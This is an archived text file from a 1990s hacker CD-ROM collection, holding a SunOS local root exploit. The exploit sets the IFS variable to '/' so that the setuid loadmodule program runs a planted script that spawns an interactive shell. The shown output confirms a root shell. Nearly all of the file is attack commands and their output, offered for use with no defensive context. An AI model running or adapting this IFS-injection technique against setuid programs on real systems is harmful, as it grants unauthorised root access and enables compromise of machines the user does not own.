home *** CD-ROM | disk | FTP | other *** search
/ For Beginners & Professional Hackers / cd.iso / hackers / exploits / sunos / sun-load.sh < prev    next >
Encoding:
Text File  |  1997-02-23  |  193 b   |  11 lines

  1. %cat > ~/bin/bin
  2. #!/bin/sh
  3. sh -i
  4. ^D
  5. %chmod 755 ~/bin/bin
  6. %setenv IFS /
  7. %cd ~/bin
  8. %/usr/openwin/bin/loadmodule /sys/sun4c/OBJ/evqmod-sun4c.o /etc/openwin/modules/evqload
  9. # whoami
  10. root
  11.